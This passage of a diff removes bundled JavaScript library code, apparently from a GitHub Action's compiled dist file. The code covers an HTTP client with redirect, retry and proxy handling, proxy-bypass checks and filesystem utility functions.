${Buffer.from(`PAT:${this.token}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; -//# sourceMappingURL=auth.js.map - -/***/ }), - -/***/ 6255: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -/* eslint-disable @typescript-eslint/no-explicit-any */ -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; -const http = __importStar(__nccwpck_require__(3685)); -const https = __importStar(__nccwpck_require__(5687)); -const pm = __importStar(__nccwpck_require__(9835)); -const tunnel = __importStar(__nccwpck_require__(4294)); -const undici_1 = __nccwpck_require__(1773); -var HttpCodes; -(function (HttpCodes) { - HttpCodes[HttpCodes["OK"] = 200] = "OK"; - HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; - HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; - HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; - HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; - HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; - HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; - HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; - HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; - HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; - HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; - HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; - HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; - HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; - HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; - 
HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; - HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; - HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; - HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; - HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; - HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; - HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; - HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; - HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; - HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; - HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; - HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; -})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); -var Headers; -(function (Headers) { - Headers["Accept"] = "accept"; - Headers["ContentType"] = "content-type"; -})(Headers || (exports.Headers = Headers = {})); -var MediaTypes; -(function (MediaTypes) { - MediaTypes["ApplicationJson"] = "application/json"; -})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); -/** - * Returns the proxy URL, depending upon the supplied url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com - */ -function getProxyUrl(serverUrl) { - const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); - return proxyUrl ? 
proxyUrl.href : ''; -} -exports.getProxyUrl = getProxyUrl; -const HttpRedirectCodes = [ - HttpCodes.MovedPermanently, - HttpCodes.ResourceMoved, - HttpCodes.SeeOther, - HttpCodes.TemporaryRedirect, - HttpCodes.PermanentRedirect -]; -const HttpResponseRetryCodes = [ - HttpCodes.BadGateway, - HttpCodes.ServiceUnavailable, - HttpCodes.GatewayTimeout -]; -const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; -const ExponentialBackoffCeiling = 10; -const ExponentialBackoffTimeSlice = 5; -class HttpClientError extends Error { - constructor(message, statusCode) { - super(message); - this.name = 'HttpClientError'; - this.statusCode = statusCode; - Object.setPrototypeOf(this, HttpClientError.prototype); - } -} -exports.HttpClientError = HttpClientError; -class HttpClientResponse { - constructor(message) { - this.message = message; - } - readBody() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - let output = Buffer.alloc(0); - this.message.on('data', (chunk) => { - output = Buffer.concat([output, chunk]); - }); - this.message.on('end', () => { - resolve(output.toString()); - }); - })); - }); - } - readBodyBuffer() { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { - const chunks = []; - this.message.on('data', (chunk) => { - chunks.push(chunk); - }); - this.message.on('end', () => { - resolve(Buffer.concat(chunks)); - }); - })); - }); - } -} -exports.HttpClientResponse = HttpClientResponse; -function isHttps(requestUrl) { - const parsedUrl = new URL(requestUrl); - return parsedUrl.protocol === 'https:'; -} -exports.isHttps = isHttps; -class HttpClient { - constructor(userAgent, handlers, requestOptions) { - this._ignoreSslError = false; - this._allowRedirects = true; - this._allowRedirectDowngrade = false; - this._maxRedirects = 50; - this._allowRetries = false; - this._maxRetries = 1; 
- this._keepAlive = false; - this._disposed = false; - this.userAgent = userAgent; - this.handlers = handlers || []; - this.requestOptions = requestOptions; - if (requestOptions) { - if (requestOptions.ignoreSslError != null) { - this._ignoreSslError = requestOptions.ignoreSslError; - } - this._socketTimeout = requestOptions.socketTimeout; - if (requestOptions.allowRedirects != null) { - this._allowRedirects = requestOptions.allowRedirects; - } - if (requestOptions.allowRedirectDowngrade != null) { - this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; - } - if (requestOptions.maxRedirects != null) { - this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); - } - if (requestOptions.keepAlive != null) { - this._keepAlive = requestOptions.keepAlive; - } - if (requestOptions.allowRetries != null) { - this._allowRetries = requestOptions.allowRetries; - } - if (requestOptions.maxRetries != null) { - this._maxRetries = requestOptions.maxRetries; - } - } - } - options(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); - }); - } - get(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('GET', requestUrl, null, additionalHeaders || {}); - }); - } - del(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('DELETE', requestUrl, null, additionalHeaders || {}); - }); - } - post(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('POST', requestUrl, data, additionalHeaders || {}); - }); - } - patch(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('PATCH', requestUrl, data, additionalHeaders || {}); - }); - } - put(requestUrl, data, additionalHeaders) { - return __awaiter(this, void 0, void 0, 
function* () { - return this.request('PUT', requestUrl, data, additionalHeaders || {}); - }); - } - head(requestUrl, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request('HEAD', requestUrl, null, additionalHeaders || {}); - }); - } - sendStream(verb, requestUrl, stream, additionalHeaders) { - return __awaiter(this, void 0, void 0, function* () { - return this.request(verb, requestUrl, stream, additionalHeaders); - }); - } - /** - * Gets a typed object from an endpoint - * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise - */ - getJson(requestUrl, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - const res = yield this.get(requestUrl, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - postJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.post(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - putJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = 
yield this.put(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - patchJson(requestUrl, obj, additionalHeaders = {}) { - return __awaiter(this, void 0, void 0, function* () { - const data = JSON.stringify(obj, null, 2); - additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); - additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); - const res = yield this.patch(requestUrl, data, additionalHeaders); - return this._processResponse(res, this.requestOptions); - }); - } - /** - * Makes a raw http request. - * All other methods such as get, post, patch, and request ultimately call this. - * Prefer get, del, post and patch - */ - request(verb, requestUrl, data, headers) { - return __awaiter(this, void 0, void 0, function* () { - if (this._disposed) { - throw new Error('Client has already been disposed.'); - } - const parsedUrl = new URL(requestUrl); - let info = this._prepareRequest(verb, parsedUrl, headers); - // Only perform retries on reads since writes may not be idempotent. - const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) - ? this._maxRetries + 1 - : 1; - let numTries = 0; - let response; - do { - response = yield this.requestRaw(info, data); - // Check if it's an authentication challenge - if (response && - response.message && - response.message.statusCode === HttpCodes.Unauthorized) { - let authenticationHandler; - for (const handler of this.handlers) { - if (handler.canHandleAuthentication(response)) { - authenticationHandler = handler; - break; - } - } - if (authenticationHandler) { - return authenticationHandler.handleAuthentication(this, info, data); - } - else { - // We have received an unauthorized response but have no handlers to handle it. - // Let the response return to the caller. 
- return response; - } - } - let redirectsRemaining = this._maxRedirects; - while (response.message.statusCode && - HttpRedirectCodes.includes(response.message.statusCode) && - this._allowRedirects && - redirectsRemaining > 0) { - const redirectUrl = response.message.headers['location']; - if (!redirectUrl) { - // if there's no location to redirect to, we won't - break; - } - const parsedRedirectUrl = new URL(redirectUrl); - if (parsedUrl.protocol === 'https:' && - parsedUrl.protocol !== parsedRedirectUrl.protocol && - !this._allowRedirectDowngrade) { - throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); - } - // we need to finish reading the response before reassigning response - // which will leak the open socket. - yield response.readBody(); - // strip authorization header if redirected to a different hostname - if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { - for (const header in headers) { - // header names are case insensitive - if (header.toLowerCase() === 'authorization') { - delete headers[header]; - } - } - } - // let's make the request with the new redirectUrl - info = this._prepareRequest(verb, parsedRedirectUrl, headers); - response = yield this.requestRaw(info, data); - redirectsRemaining--; - } - if (!response.message.statusCode || - !HttpResponseRetryCodes.includes(response.message.statusCode)) { - // If not a retry code, return immediately instead of retrying - return response; - } - numTries += 1; - if (numTries < maxTries) { - yield response.readBody(); - yield this._performExponentialBackoff(numTries); - } - } while (numTries < maxTries); - return response; - }); - } - /** - * Needs to be called if keepAlive is set to true in request options. - */ - dispose() { - if (this._agent) { - this._agent.destroy(); - } - this._disposed = true; - } - /** - * Raw request. 
- * @param info - * @param data - */ - requestRaw(info, data) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => { - function callbackForResult(err, res) { - if (err) { - reject(err); - } - else if (!res) { - // If `err` is not passed, then `res` must be passed. - reject(new Error('Unknown error')); - } - else { - resolve(res); - } - } - this.requestRawWithCallback(info, data, callbackForResult); - }); - }); - } - /** - * Raw request with callback. - * @param info - * @param data - * @param onResult - */ - requestRawWithCallback(info, data, onResult) { - if (typeof data === 'string') { - if (!info.options.headers) { - info.options.headers = {}; - } - info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); - } - let callbackCalled = false; - function handleResult(err, res) { - if (!callbackCalled) { - callbackCalled = true; - onResult(err, res); - } - } - const req = info.httpModule.request(info.options, (msg) => { - const res = new HttpClientResponse(msg); - handleResult(undefined, res); - }); - let socket; - req.on('socket', sock => { - socket = sock; - }); - // If we ever get disconnected, we want the socket to timeout eventually - req.setTimeout(this._socketTimeout || 3 * 60000, () => { - if (socket) { - socket.end(); - } - handleResult(new Error(`Request timeout: ${info.options.path}`)); - }); - req.on('error', function (err) { - // err has statusCode property - // res should have headers - handleResult(err); - }); - if (data && typeof data === 'string') { - req.write(data, 'utf8'); - } - if (data && typeof data !== 'string') { - data.on('close', function () { - req.end(); - }); - data.pipe(req); - } - else { - req.end(); - } - } - /** - * Gets an http agent. This function is useful when you need an http agent that handles - * routing through a proxy server - depending upon the url and proxy environment variables. - * @param serverUrl The server URL where the request will be sent. 
For example, https://api.github.com - */ - getAgent(serverUrl) { - const parsedUrl = new URL(serverUrl); - return this._getAgent(parsedUrl); - } - getAgentDispatcher(serverUrl) { - const parsedUrl = new URL(serverUrl); - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if (!useProxy) { - return; - } - return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); - } - _prepareRequest(method, requestUrl, headers) { - const info = {}; - info.parsedUrl = requestUrl; - const usingSsl = info.parsedUrl.protocol === 'https:'; - info.httpModule = usingSsl ? https : http; - const defaultPort = usingSsl ? 443 : 80; - info.options = {}; - info.options.host = info.parsedUrl.hostname; - info.options.port = info.parsedUrl.port - ? parseInt(info.parsedUrl.port) - : defaultPort; - info.options.path = - (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); - info.options.method = method; - info.options.headers = this._mergeHeaders(headers); - if (this.userAgent != null) { - info.options.headers['user-agent'] = this.userAgent; - } - info.options.agent = this._getAgent(info.parsedUrl); - // gives handlers an opportunity to participate - if (this.handlers) { - for (const handler of this.handlers) { - handler.prepareRequest(info.options); - } - } - return info; - } - _mergeHeaders(headers) { - if (this.requestOptions && this.requestOptions.headers) { - return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); - } - return lowercaseKeys(headers || {}); - } - _getExistingOrDefaultHeader(additionalHeaders, header, _default) { - let clientHeader; - if (this.requestOptions && this.requestOptions.headers) { - clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; - } - return additionalHeaders[header] || clientHeader || _default; - } - _getAgent(parsedUrl) { - let agent; - const proxyUrl = pm.getProxyUrl(parsedUrl); - const useProxy = proxyUrl && proxyUrl.hostname; - if 
(this._keepAlive && useProxy) { - agent = this._proxyAgent; - } - if (this._keepAlive && !useProxy) { - agent = this._agent; - } - // if agent is already assigned use that agent. - if (agent) { - return agent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - let maxSockets = 100; - if (this.requestOptions) { - maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; - } - // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. - if (proxyUrl && proxyUrl.hostname) { - const agentOptions = { - maxSockets, - keepAlive: this._keepAlive, - proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { - proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` - })), { host: proxyUrl.hostname, port: proxyUrl.port }) - }; - let tunnelAgent; - const overHttps = proxyUrl.protocol === 'https:'; - if (usingSsl) { - tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; - } - else { - tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; - } - agent = tunnelAgent(agentOptions); - this._proxyAgent = agent; - } - // if reusing agent across request and tunneling agent isn't assigned create a new agent - if (this._keepAlive && !agent) { - const options = { keepAlive: this._keepAlive, maxSockets }; - agent = usingSsl ? new https.Agent(options) : new http.Agent(options); - this._agent = agent; - } - // if not using private agent and tunnel agent isn't setup then use global agent - if (!agent) { - agent = usingSsl ? 
https.globalAgent : http.globalAgent; - } - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - agent.options = Object.assign(agent.options || {}, { - rejectUnauthorized: false - }); - } - return agent; - } - _getProxyAgentDispatcher(parsedUrl, proxyUrl) { - let proxyAgent; - if (this._keepAlive) { - proxyAgent = this._proxyAgentDispatcher; - } - // if agent is already assigned use that agent. - if (proxyAgent) { - return proxyAgent; - } - const usingSsl = parsedUrl.protocol === 'https:'; - proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { - token: `${proxyUrl.username}:${proxyUrl.password}` - }))); - this._proxyAgentDispatcher = proxyAgent; - if (usingSsl && this._ignoreSslError) { - // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process - // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options - // we have to cast it to any and change it directly - proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { - rejectUnauthorized: false - }); - } - return proxyAgent; - } - _performExponentialBackoff(retryNumber) { - return __awaiter(this, void 0, void 0, function* () { - retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); - const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); - return new Promise(resolve => setTimeout(() => resolve(), ms)); - }); - } - _processResponse(res, options) { - return __awaiter(this, void 0, void 0, function* () { - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - const statusCode = res.message.statusCode || 0; - const response = { - statusCode, 
- result: null, - headers: {} - }; - // not found leads to null obj returned - if (statusCode === HttpCodes.NotFound) { - resolve(response); - } - // get the result from the body - function dateTimeDeserializer(key, value) { - if (typeof value === 'string') { - const a = new Date(value); - if (!isNaN(a.valueOf())) { - return a; - } - } - return value; - } - let obj; - let contents; - try { - contents = yield res.readBody(); - if (contents && contents.length > 0) { - if (options && options.deserializeDates) { - obj = JSON.parse(contents, dateTimeDeserializer); - } - else { - obj = JSON.parse(contents); - } - response.result = obj; - } - response.headers = res.message.headers; - } - catch (err) { - // Invalid resource (contents not json); leaving result obj null - } - // note that 3xx redirects are handled by the http layer. - if (statusCode > 299) { - let msg; - // if exception/error in body, attempt to get better error - if (obj && obj.message) { - msg = obj.message; - } - else if (contents && contents.length > 0) { - // it may be the case that the exception is in the body message as string - msg = contents; - } - else { - msg = `Failed request: (${statusCode})`; - } - const err = new HttpClientError(msg, statusCode); - err.result = response.result; - reject(err); - } - else { - resolve(response); - } - })); - }); - } -} -exports.HttpClient = HttpClient; -const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); -//# sourceMappingURL=index.js.map - -/***/ }), - -/***/ 9835: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.checkBypass = exports.getProxyUrl = void 0; -function getProxyUrl(reqUrl) { - const usingSsl = reqUrl.protocol === 'https:'; - if (checkBypass(reqUrl)) { - return undefined; - } - const proxyVar = (() => { - if (usingSsl) { - return process.env['https_proxy'] || process.env['HTTPS_PROXY']; - } - else { - 
return process.env['http_proxy'] || process.env['HTTP_PROXY']; - } - })(); - if (proxyVar) { - try { - return new URL(proxyVar); - } - catch (_a) { - if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) - return new URL(`http://${proxyVar}`); - } - } - else { - return undefined; - } -} -exports.getProxyUrl = getProxyUrl; -function checkBypass(reqUrl) { - if (!reqUrl.hostname) { - return false; - } - const reqHost = reqUrl.hostname; - if (isLoopbackAddress(reqHost)) { - return true; - } - const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; - if (!noProxy) { - return false; - } - // Determine the request port - let reqPort; - if (reqUrl.port) { - reqPort = Number(reqUrl.port); - } - else if (reqUrl.protocol === 'http:') { - reqPort = 80; - } - else if (reqUrl.protocol === 'https:') { - reqPort = 443; - } - // Format the request hostname and hostname with port - const upperReqHosts = [reqUrl.hostname.toUpperCase()]; - if (typeof reqPort === 'number') { - upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); - } - // Compare request host against noproxy - for (const upperNoProxyItem of noProxy - .split(',') - .map(x => x.trim().toUpperCase()) - .filter(x => x)) { - if (upperNoProxyItem === '*' || - upperReqHosts.some(x => x === upperNoProxyItem || - x.endsWith(`.${upperNoProxyItem}`) || - (upperNoProxyItem.startsWith('.') && - x.endsWith(`${upperNoProxyItem}`)))) { - return true; - } - } - return false; -} -exports.checkBypass = checkBypass; -function isLoopbackAddress(host) { - const hostLower = host.toLowerCase(); - return (hostLower === 'localhost' || - hostLower.startsWith('127.') || - hostLower.startsWith('[::1]') || - hostLower.startsWith('[0:0:0:0:0:0:0:1]')); -} -//# sourceMappingURL=proxy.js.map - -/***/ }), - -/***/ 1962: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -var _a; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getCmdPath = exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; -const fs = __importStar(__nccwpck_require__(7147)); -const path = __importStar(__nccwpck_require__(1017)); -_a = fs.promises -// export const {open} = 'fs' -, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; -// export const {open} = 'fs' -exports.IS_WINDOWS = process.platform === 'win32'; -// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 -exports.UV_FS_O_EXLOCK = 0x10000000; -exports.READONLY = fs.constants.O_RDONLY; -function exists(fsPath) { - return __awaiter(this, void 0, void 0, function* () { - try { - yield exports.stat(fsPath); - } - catch (err) { - if (err.code === 'ENOENT') { - return false; - } - throw err; - } - return true; - }); -} -exports.exists = exists; -function isDirectory(fsPath, useStat = false) { - return __awaiter(this, void 0, void 0, function* () { - const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); - return stats.isDirectory(); - }); -} -exports.isDirectory = isDirectory; -/** - * On OSX/Linux, true if path starts with '/'. 
On Windows, true for paths like: - * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). - */ -function isRooted(p) { - p = normalizeSeparators(p); - if (!p) { - throw new Error('isRooted() parameter "p" cannot be empty'); - } - if (exports.IS_WINDOWS) { - return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello - ); // e.g. C: or C:\hello - } - return p.startsWith('/'); -} -exports.isRooted = isRooted; -/** - * Best effort attempt to determine whether a file exists and is executable. - * @param filePath file path to check - * @param extensions additional file extensions to try - * @return if file exists and is executable, returns the file path. otherwise empty string. - */ -function tryGetExecutablePath(filePath, extensions) { - return __awaiter(this, void 0, void 0, function* () { - let stats = undefined; - try { - // test file exists - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // on Windows, test for valid extension - const upperExt = path.extname(filePath).toUpperCase(); - if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { - return filePath; - } - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - // try each extension - const originalFilePath = filePath; - for (const extension of extensions) { - filePath = originalFilePath + extension; - stats = undefined; - try { - stats = yield exports.stat(filePath); - } - catch (err) { - if (err.code !== 'ENOENT') { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); - } - } - if (stats && stats.isFile()) { - if (exports.IS_WINDOWS) { - // preserve the case of 
the actual file (since an extension was appended) - try { - const directory = path.dirname(filePath); - const upperName = path.basename(filePath).toUpperCase(); - for (const actualName of yield exports.readdir(directory)) { - if (upperName === actualName.toUpperCase()) { - filePath = path.join(directory, actualName); - break; - } - } - } - catch (err) { - // eslint-disable-next-line no-console - console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); - } - return filePath; - } - else { - if (isUnixExecutable(stats)) { - return filePath; - } - } - } - } - return ''; - }); -} -exports.tryGetExecutablePath = tryGetExecutablePath; -function normalizeSeparators(p) { - p = p || ''; - if (exports.IS_WINDOWS) { - // convert slashes on Windows - p = p.replace(/\//g, '\\'); - // remove redundant slashes - return p.replace(/\\\\+/g, '\\'); - } - // remove redundant slashes - return p.replace(/\/\/+/g, '/'); -} -// on Mac/Linux, test the execute bit -// R W X R W X R W X -// 256 128 64 32 16 8 4 2 1 -function isUnixExecutable(stats) { - return ((stats.mode & 1) > 0 || - ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || - ((stats.mode & 64) > 0 && stats.uid === process.getuid())); -} -// Get the path of cmd.exe in windows -function getCmdPath() { - var _a; - return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; -} -exports.getCmdPath = getCmdPath; -//# sourceMappingURL=io-util.js.map - -/***/ }), - -/***/ 7436: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
